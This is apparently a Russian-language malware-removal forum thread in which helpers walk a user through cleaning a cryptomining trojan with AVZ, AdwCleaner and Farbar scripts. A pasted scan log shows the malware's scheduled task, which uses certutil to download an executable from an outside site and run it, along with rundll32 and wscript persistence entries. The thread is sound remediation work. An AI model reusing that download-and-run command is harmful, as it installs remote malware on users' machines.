ПОМОГИТЕ! Поймал трояна-майнера &am p;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;a mp;

[FXtrt]

https://pp.userapi.com/c851416/v8514...OL1l3Jmr3Q.jpg Фото из карантина MBAM
Вирус вроде как изолирован, штатными средствами MBAM, но постоянно появляются уведомления от MBAM о том, что из директории c/programdata/lsass.exe куда то "пытается выбраться" ,
еще из system32 файл certutil.exe был так же замечен в области уведомлений антивируса.
Так же появляются уведомления об внешних атаках с каких то сайтов.
Вот хотелось бы вылечится от всего выше перечисленного.

Предоставляю логи с помощью вашей новой автоматизированной утилиты по сбору логов, кстати очень удобной!

UPD Еще 1 процесс
https://pp.userapi.com/c851216/v8512...6D6CP5E4hE.jpg

[Info_bot]

Уважаемый(ая) FXtrt, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[SQ]

Здравствуйте,

HiJackThis (из каталога autologger)профиксить

Код:

O2 - HKLM\..\BHO: (no name) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - (no file)
O4-32 - HKLM\..\Run: [rundll] = C:\Windows\system32\wscript.exe C:\ProgramData\indus\start.vbs
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt01 - {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt02 - {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt03 - {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt04 - {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt05 - {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt06 - {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt07 - {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt08 - {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt09 - {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt10 - {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt01 - {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt02 - {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt03 - {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt04 - {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt05 - {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt06 - {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt07 - {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt08 - {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt09 - {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:    DropboxExt10 - {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} - (no file)
O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://newscommer.com/app/app.exe C:\Users\FXtrt-new\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\FXtrt-new\AppData\Local\Temp\csrss\scheduled.exe /31340
O22 - Task: TzltYpotJgryG2 - C:\Windows\system32\wscript.exe "C:\ProgramData\vAtgRIojrOIejiVB\UOkHfCV.wsf"
O22 - Task: eVSrriCnrZQlODxsGDB2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\WNVwerPrGBZQC\pHEzLFa.dll",#1
O22 - Task: gkNqfjNoNlLfJVmHB2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\JQNLggXpPPpITxfrDoR\WBSBids.dll",#1
O22 - Task: xdbGJPONaKkXIL - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\wunGYWhMeqNU2\yRFOgrVxZDRjX.dll",#1
O22 - Task: yKMtMHoPoUUExsP2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\vEuomKaIU\ROrxDj.dll",#1

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Program Files (x86)\vEuomKaIU\ROrxDj.dll','');
 QuarantineFileF('C:\Program Files (x86)\vEuomKaIU', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\Program Files (x86)\wunGYWhMeqNU2\yRFOgrVxZDRjX.dll','');
 QuarantineFileF('C:\Program Files (x86)\wunGYWhMeqNU2', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\ProgramData\vAtgRIojrOIejiVB\UOkHfCV.wsf','');
 QuarantineFileF('C:\ProgramData\vAtgRIojrOIejiVB', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\Users\FXtrt-new\AppData\Local\Temp\csrss\scheduled.exe','');
 QuarantineFileF('C:\Users\FXtrt-new\AppData\Local\Temp\csrss', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\Users\FXtrt-new\AppData\Roaming\keycreator\kget.exe','');
 QuarantineFile('C:\Windows\winmain64.exe','');
 QuarantineFile('F:\DOWNLOADS\Key Remapper Reset Trial!!!!!!!!!!!!!!!!\Reset Trial for Key Remapper\tr.exe','');
 QuarantineFile('C:\Program Files (x86)\JQNLggXpPPpITxfrDoR\WBSBids.dll','');
 QuarantineFileF('C:\Program Files (x86)\JQNLggXpPPpITxfrDoR', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\Program Files (x86)\WNVwerPrGBZQC\pHEzLFa.dll','');
 QuarantineFileF('C:\Program Files (x86)\WNVwerPrGBZQC', '*.exe,*.dll,*.sys', false,'', 0, 0);
 QuarantineFile('C:\Program Files\Pursuit\Pursuit.exe','');
 QuarantineFile('C:\ProgramData\indus\start.vbs','');
 QuarantineFileF('C:\ProgramData\indus', '*.exe,*.dll,*.sys', false,'', 0, 0);
 DeleteFile('C:\ProgramData\indus\start.vbs','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','rundll');
 DeleteFile('C:\Program Files (x86)\WNVwerPrGBZQC\pHEzLFa.dll','32');
 DeleteFile('C:\Program Files (x86)\JQNLggXpPPpITxfrDoR\WBSBids.dll','32');
 DeleteFile('C:\Users\FXtrt-new\AppData\Local\Temp\csrss\scheduled.exe','32');
 DeleteFile('C:\ProgramData\vAtgRIojrOIejiVB\UOkHfCV.wsf','32');
 DeleteFile('C:\Program Files (x86)\wunGYWhMeqNU2\yRFOgrVxZDRjX.dll','32');
 DeleteFile('C:\Program Files (x86)\vEuomKaIU\ROrxDj.dll','32');
 ExecuteFile('schtasks.exe', '/delete /TN "eVSrriCnrZQlODxsGDB2" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "gkNqfjNoNlLfJVmHB2" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "ScheduledUpdate" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "TzltYpotJgryG2" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "xdbGJPONaKkXIL" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "yKMtMHoPoUUExsP2" /F', 0, 15000, true);
 BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Подготовьте лог AdwCleaner и приложите его в теме.

[FXtrt]

Результат загрузки
Файл сохранён как 180928_200914_quarantine_5bae8a6a5e0b8.zip
Размер файла 5091650
MD5 9aa8f013896d32b2548b59ee5f009275
Файл закачан, спасибо!
------------------------------------------------------------------------------------------

ADWCLEANER LOG

# -------------------------------
# Malwarebytes AdwCleaner 7.2.4.0
# -------------------------------
# Build: 09-25-2018
# Database: 2018-09-24.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 09-28-2018
# Duration: 00:00:07
# OS: Windows 7 Ultimate
# Scanned: 42059
# Detected: 26


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Adware.InstallCore C:\Users\FXtrt-new\AppData\Roaming\Onetabber
PUP.Optional.Mail.Ru C:\Windows\SysWOW64\config\systemprofile\AppData\L ocal\Mail.Ru
PUP.Optional.Mail.Ru C:\Users\FXtrt-new\AppData\Local\Mail.Ru
Trojan.Agent C:\Windows\rss

***** [ Files ] *****

PUP.Optional.Legacy C:\Users\FXtrt-new\Favorites\Искать в Интернете.url
PUP.Optional.Legacy C:\Users\FXtrt-new\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk
PUP.Optional.Legacy C:\Users\FXtrt-new\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Одноклассники.lnk
PUP.Optional.Legacy C:\Users\FXtrt-new\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk
PUP.Optional.Legacy C:\Users\FXtrt-new\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Вконтакте.lnk

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

Adware.DNSUnlocker HKLM\Software\Wow6432Node\Microsoft\Windows\Curren tVersion\Uninstall\11598763487076930564
Adware.MyWaySearch HKLM\Software\Classes\tsckmna
PUP.Optional.InstallCore HKCU\Software\csastats
PUP.Optional.Legacy HKCU\Software\Microsoft\Gosearch
PUP.Optional.Legacy HKCU\Software\Microsoft\Windows\CurrentVersion\Ext \Stats\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
PUP.Optional.Legacy HKLM\Software\Microsoft\Windows\CurrentVersion\Exp lorer\Browser Helper Objects\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
PUP.Optional.Legacy HKLM\Software\Classes\CLSID\{F9E4A054-E9B1-4BC3-83A3-76A1AE736170}
PUP.Optional.Legacy HKLM\Software\Wow6432Node\Classes\TypeLib\{E69D4A5 9-73DE-4E38-9FB3-740EC4D9060D}
PUP.Optional.Legacy HKLM\Software\Classes\TypeLib\{E69D4A59-73DE-4E38-9FB3-740EC4D9060D}
PUP.Optional.Mail.Ru HKCU\Software\AppDataLow\Software\Mail.Ru
PUP.Optional.Mail.Ru HKU\S-1-5-18\Software\Mail.Ru
PUP.Optional.Mail.Ru HKCU\Software\Mail.Ru
PUP.Optional.Mail.Ru HKU\.DEFAULT\Software\Mail.Ru
PUP.Optional.Mail.Ru HKLM\Software\Wow6432Node\Mail.Ru
PUP.Optional.SpyHunter HKLM\Software\Wow6432Node\EnigmaSoftwareGroup
PUP.Optional.uBar HKLM\Software\UBar
Trojan.Agent HKCU\Software\WidModule

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########

[SQ]

Добавляйте отчеты как вложение, а не как текст.


Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

- - - - -Добавлено - - - - -

Пришел ответ от Вир. лаба:

rundll.exe_ - Trojan.Win32.Pytox.qe


Присланные вами файлы детектируются верно:

2x64.dll - HEUR:Trojan.Win32.Blouiroet.gen
3x64.dll - HEUR:Trojan.Win32.Blouiroet.gen

[FXtrt]

Вложил последние отчеты, всё что обнаружено было пометил на удаление.

[SQ]

- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[FXtrt]

Прогнал, вот запрашиваемые отчёты.

[SQ]

Сами устанавливали?

Код:

indus version 1.5 (HKLM-x32\...\{02010D42-66F5-439A-A522-0553908A1988}_is1) (Version: 1.5 - indus)

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  
  Код:

  CreateRestorePoint:
  CloseProcesses:
  File: F:\DOWNLOADS\memreduct-3.2.2-bin\64\memreduct.exe
  File: C:\Program Files\Pursuit\Pursuit.exe 
  File: C:\Program Files (x86)\Login.HNT\login.hnt.exe
  GroupPolicy: Restriction - Chrome <==== ATTENTION
  CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
  HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
  OPR Extension: (Adblocker for Youtube™) - C:\Users\FXtrt-new\AppData\Roaming\Opera Software\Opera Stable\Extensions\dljmpahjdmlcmopgciohdemghjmdfdbn [2018-09-12]
  S2 BitStreamSvc; C:\Windows\System32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
  S2 BitStreamSvc; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
  File: C:\Program Files (x86)\Acronis\DiskDirector\OSS\reinstall_svc.exe 
  S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
  S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
  File: C:\Windows\System32\drivers\dadder.sys
  File: C:\Windows\System32\drivers\danew.sys
  Folder: C:\Users\FXtrt-new\AppData\Roaming\Chamber
  Folder: C:\ProgramData\indus
  2018-09-25 21:53 - 2018-09-25 21:58 - 000000000 _____ C:\Users\FXtrt-new\AppData\Local\{FEAE970D-6EB8-440C-ACB7-881397894725}
  Folder: C:\Users\FXtrt-new\AppData\Local\homenetinfo
  2018-02-11 16:11 - 2018-02-11 16:11 - 000000000 _____ () C:\Users\FXtrt-new\AppData\Local\{0ED08D00-9010-49AA-9B05-FA63906AECB0}
  2018-09-25 21:53 - 2018-09-25 21:58 - 000000000 _____ () C:\Users\FXtrt-new\AppData\Local\{FEAE970D-6EB8-440C-ACB7-881397894725}
  ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
  ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} =>  -> No File
  ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} =>  -> No File
  ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} =>  -> No File
  File: C:\Windows\srv_ext.exe
  Zip: C:\Windows\srv_ext.exe
  ShortcutWithArgument: C:\Users\FXtrt-new\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "hxxp://yunobyk.ru/?utm_source=startlink03&utm_content=219cd7cebbc0daa562281c2978ea2cce&utm_term=1657DB28EC32CA202EE9EF6CEF457B24&utm_d=20171024"
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

На рабочем столе образуется карантин вида <date>.zip загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

[FXtrt]

Нет такой программой не пользуюсь:
indus version 1.5 (HKLM-x32\...\{02010D42-66F5-439A-A522-0553908A1988}_is1) (Version: 1.5 - indus)

Карантин и лог приложил после проведённых действий
Прошу прощения, карантин не туда залил, теперь по ссылке не даёт его залить, в прочем, он всё равно пустой получился, судя по всему.

[SQ]

Удалите indus через установку прорамм в панели управления:

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  
  Код:

  CreateRestorePoint:
  CloseProcesses:
  C:\ProgramData\indus
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

[FXtrt]

Лог прикрепил, буквально за секунду до проделаных операций МBAM ругался на этот indus (скриншот)
https://pp.userapi.com/c852032/v8520...wpmQ-YRGvo.jpg

[SQ]

лог не соответствует фиксу.

[FXtrt]

Прошу прощения, видимо каким то чудом предыдущий загрузился

[SQ]

Сообщите, что с проблемой?

[FXtrt]

програму INDUS удалил через панель управления, как Вы и сказали, антивирус больше не ругался, я пологаю что проблема решена благодаря Вам

[SQ]

В завершение:
1.

• Пожалуйста, запустите adwcleaner.exe
• В меню Настройки - Удалить AdwCleaner - выберите Удалить.
• Подтвердите удаление, нажав кнопку: Да.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 6
• В ходе лечения обнаружены вредоносные программы:
  
  1. c:\programdata\indus\2x64.dll - HEUR:Trojan.Win32.Blouiroet.gen ( AVAST4: Win64:Evo-gen [Susp] )
  2. c:\programdata\indus\3x64.dll - HEUR:Trojan.Win32.Blouiroet.gen ( AVAST4: Win64:Evo-gen [Susp] )